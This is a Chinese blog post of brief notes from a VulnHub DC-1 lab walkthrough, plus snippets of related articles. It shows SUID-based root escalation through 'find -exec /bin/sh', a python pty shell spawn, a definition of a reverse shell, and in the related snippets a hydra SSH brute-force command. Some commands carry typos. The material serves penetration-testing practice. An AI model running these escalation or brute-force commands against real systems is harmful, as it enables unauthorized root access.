靶场DC1过程总结

最新推荐文章于 2025-05-08 11:34:37 发布

曼达洛战士

最新推荐文章于 2025-05-08 11:34:37 发布

阅读量77

点赞数

文章标签： linux 运维服务器

本文链接：https://blog.youkuaiyun.com/qq_57774303/article/details/134846718

版权

本文介绍了如何通过SUID权限提升到root用户，包括使用find命令查找具有SUID的文件和Python脚本的提权方法。同时讨论了反弹shell的概念以及连接数据库时遇到的加密问题，涉及PHP框架的应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

find获得权限的笔记

SUID提权的思路就是运行root用户所拥有的SUID的文件，当其他用户运行该文件的时候就得获得root用户的身份。

使用find命令查看拥有suid权限的文件

find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/del/null

按照刚刚学的

find text.sh -exec "/bin/sh" \;

所以这里的提权语句是 find / -name corn.php -exec "/bin/sh"\是找到名字为 corn.php的文件然后获取他的root权限

root用户是指唯一的超级用户

什么是反弹shell 反弹shell就是主机主动连接攻击机发送信息

sudo python -c 'import pty;pty.spawn("/bin/bash")'

这是python提权的常见姿势

成功

连接数据库

其实已经连接到use的数据库了只是还是显示mysql

输入 showtables;

用户被加密

用的是php框架

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

曼达洛战士

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulnhub靶场 DC-1靶机渗透详细过程

黑战士的博客

07-26

1334

1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破：sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权：Linux下用SUID提权、find命令exec。

渗透测试初体验：DC-1靶场

SmileAssassn的博客

08-07

597

渗透测试靶场DC：1，新手练习使用

参与评论您还未登录，请先登录后发表或查看评论

DC-1靶场实验报告

jiaxingjia123的博客

09-25

898

DC-1靶场实验报告

靶场练习手把手教你通关DC系列 DC1

QYbkx974的博客

07-09

1228

本次使用的kali机的IP地址为DC1的地址为靶场IP地址为: 192.168.243.134开放端口: 22/ssh 80/http 111/rpcbind框架: cms Drupal 7中间件: Apache 2.2.22语言: php 5.4.45操作系统: Debian。

DC-1靶场实战详解

热门推荐

a310034188的博客

11-20

1万+

写写自己打DC-1的过程使用工具 kali DC-1的靶机下载地址为：https://www.vulnhub.com/entry/dc-1,292/ 第一步：环境配置。我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式，具体多少暂时也不知道。第二步：信息收集 \1. DC-1 IP不知道，那我们首先就先主机存活探测下，看看靶机IP是多少。为了提高效率，我们直接用nmap,或者arp-scan。 nmap：nmap -sP

DC-1靶场渗透测试实验整理

u013930899的博客

09-10

2359

DC-1实验

DC-1靶场机渗透测试总结与全流程思路+后期复盘

m0_74220316的博客

11-20

948

在此靶场中，使用了metaspolit的基础操作，但是并未涉及到木马生成与上传然后getshell，然后我们获取到了CMS的关键配置文件，然后对靶机中的passwdCMS的信息搜集与利用，漏洞披露，关键配置文件目标上存在的用户信息，用户权限详情网站的后台管理页面探测，网站密码的生成策略数据库入侵的操作，对于加密密码的处理对于当前用户的权限提升（非root）

基于Vulnhub靶场的DC1靶机攻防环境全过程解题

旺仔Sec&blog

01-09

1053

vulnhub—DC-1靶机存在五个flag文件，让渗透者可以体验闯关的流程。相关技术涉及到了渗透技术、数据库技术、Linux操作系统运维命令等。循序渐进的获取每一个flag线索并最终得到最后的flag信息。创作不易，还请三连！

2024kali上打DC-1靶场

2301_80110280的博客

07-16

1970

Current Setting是目前设置的内容 Required表示是否需要设置内容，yes为必须设置，no可以设置也可不设置就上面来说RHOSTS需要set，但是没有内容所以接着我们来设置一下RHOSTS内容（就是攻击目标IP地址，靶场地址）

渗透测试综合靶场 DC-1 通关详解

goldfish8848的博客

09-18

1785

我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap（网络映射器）是一款开源的网络扫描和安全审计工具，它可以用来发现网络上的设备，检测开放的端口，确定运行在网络设备上的服务及其版本信息，以及检测潜在的安全漏洞。常用nmap命令：nmap -sn 目标IP地址：快速扫描目标网络，仅用于主机发现，不扫描端口。nmap -sn 目标IP地址/24：扫描整个C类子网。nmap 目标IP地址：扫描目标IP地址上的常见端口。nmap -p 端口号目标IP地址：扫描特定端口。

VulnHub-DC-1靶机渗透测试和相应的知识点总结

qq_45584159的博客

12-15

1602

文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令，来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口，并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用：术语：模块：基础指令：模块使用规则：msf中大多数命令：第一步.启动msf：第二步.搜索drupal可利用的漏洞第三步，采用最新的2018漏洞尝试攻击，配置参数第四步，反弹shell四. 进入数据库第一步.进入数据库前言这是我第一次使用

DC-1靶场通关笔记

告白的博客

07-19

829

0x00 DC-1靶场介绍靶场介绍：关于VulnhubVulnhub是一个特别好的渗透测试实战网站，提供了许多带有漏洞的渗透测试渗透要求：靶机需要获得root权限，并找到所有的5个flag 环境配置：因不知道DC-1靶机的IP，所有我们需要将靶机和kali放在同一个局域网里面，这里我选择NAT模式 0x01 信息收集首先进去DC-1靶场环境，显示一个登录页面，我们无法得到账户与密码，因为靶机在NAT模式，故可以用域内存活主机利用工具扫描域内存活主机 1）目标IP收集这里利用kali扫描域内存

DC-1靶场

2301_77518341的博客

09-24

1586

DC-1靶场实验报告DC-1是一个专门建立的脆弱实验室，目的是获得渗透测试领域的经验。它是为初学者设计的挑战，但它到底有多容易取决于你的技能和知识，以及你的学习能力。要成功完成这一挑战，您需要掌握Linux技能，熟悉Linux命令行，并具有基本渗透测试工具的经验，例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根，但是，我为初学者提供了一些包含线索的标志。总共有五个flag，但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作，但是

DC-1实验报告

2401_85238681的博客

09-25

644

它是为初学者设计的挑战，但它到底有多容易取决于你的技能和知识，以及你的学习能力。要成功完成这一挑战，您需要掌握Linux技能，熟练Linux命令行，并具有基本渗透测试工具的经验，列如可以在Kali Linux或Parrot Security Os上找到的工具。有多种方法可以获得根，但是，我为初学者提供了一些包含线索的标志。扫描网段中有哪些主机在线，使用 -sP参数，不扫描端口，只扫描存活主机。查看www目录下文件，现在flag1.txt文件，打开发现提示信息，内容提示寻找站点的配置文件。

《操作系统精髓与设计原理》第4章课后题答案-线程、对称多处理器和微内核

2501_90434822的博客

05-03

819

1.表3.5列出了在一个没有线程的操作系统中进程控制块的基本元素。对于不同的系统来说通常是不同的，但一般来说，进程是资源的所有者，而每个线程有它自己的执行状态。Jacketing通过调用一个应用级的I/O例程来检查I/O设备的状态，从而将一个产生阻塞的系统调用转化为一个不产生阻塞的系统调用。2.请列出线程间的模式切换比进程间的模式切换开销更低的原因。3.进程概念中体现出的两个独立且无关的概念是什么？6.列出用户级线程优于内核级线程的三个优点。7.列出用户级线程相对内核级线程的两个缺点。包含的状态信息更少。

从实列中学习linux shell11 ：在 shell 中对于json的解析 jq 和awk 如何选择，尤其在数据清洗，数据重新组织中的应用

zqy216_2008的博客

05-03

2007

在 shell 中对于json的解析 jq 和awk 如何选择，尤其在数据清洗，数据重新组织中的应用

Linux 系统的进阶指令详解

独坐一隅，凝神遐想，是种幸福！ ——独隅

05-07

1190

Linux 系统的进阶指令详解

软考【软考高级QA】

Code_Beginner

05-07

104

等待：进程因等待事件（如等待IO操作完成、等待信号等）而暂停执行，等待过程不占用CPU资源。事件执行完成后进程转换为就绪状态。新建->就绪：进程已经分配好了除CPU资源之外的其他所有资源。就绪：进程其他资源已分配好，等待分配CPU资源。终止：进程执行完成或被操作系统强制终止。运行：进程正在使用CPU资源执行指令。新建：进程刚被创建。

配置linux自启java程序

最新发布

alterhz的博客

05-08

125

linux配置自启java程序

vulnhub dc1

01-14

### VulnHub DC-1 渗透测试实验环境下载与指导 #### 实验环境概述 VulnHub上的DC-1是一个面向初学者的虚拟机镜像，旨在提供一个安全的学习环境来练习基本的渗透测试技能。该靶机运行Ubuntu操作系统，并部署了一个存在多个漏洞的应用程序——Drupal 7网站。 #### 下载指南为了获取DC-1的实验环境，访问[VulnHub官方网站](https://www.vulnhub.com/)并搜索“DC-1”。按照页面指示下载对应的OVA文件，此文件适用于VirtualBox或VMware等虚拟化软件安装使用[^1]。 #### 测试前准备确保攻击者使用的Kali Linux系统已经正确配置网络设置以便能够与目标机器通信。通常情况下，建议采用NAT模式或者桥接模式连接至同一局域网内[^2]。 #### 初始信息收集启动虚拟机之后，可以先执行简单的主机发现操作，比如使用`ping`命令确认目标存活状态；接着运用工具如`nmap`进行全面端口和服务扫描： ```bash nmap -A 192.168.189.172 ``` 上述命令将会返回有关开放端口以及可能存在的服务版本的信息，这对于后续攻击路径的选择至关重要[^3]。 #### Web应用分析根据前期侦察得知，Web服务器托管着一个Drupal CMS实例。考虑到这是较旧版本（Drupal 7），可能存在已知的安全缺陷。此时可查阅CVE数据库或其他资源了解针对此类系统的具体攻击向量[^4]。 #### 获取初始Shell 一旦识别到可用漏洞，则可通过Metasploit框架快速建立远程会话。例如，如果选择了某个适合于Drupal 7.x的exploit模块，那么只需指定RHOST参数指向受害者的IP地址即可尝试入侵[^5]。 #### 提升权限成功植入后门并不意味着结束战斗。接下来的任务是要设法提升当前用户的权限级别直至root账户。这一步骤往往涉及寻找具有SUID位设定的二进制文件并通过它们实施本地提权技巧。例如，利用`find`命令定位潜在的目标对象： ```bash find / -perm -u=s -type f 2>/dev/null ``` 以上代码片段用于遍历整个文件系统树结构，过滤出那些设置了SETUID标志且属于常规类型的节点[^6]。 #### 寻找Flag文件在整个过程中，参与者需留意任何关于隐藏标记（flags）位置的线索提示。这些flag通常被放置在特定目录下作为完成各个阶段挑战任务的关键证明材料。对于本案例而言，至少存在五个不同级别的flag等待探索者去发掘[^7]。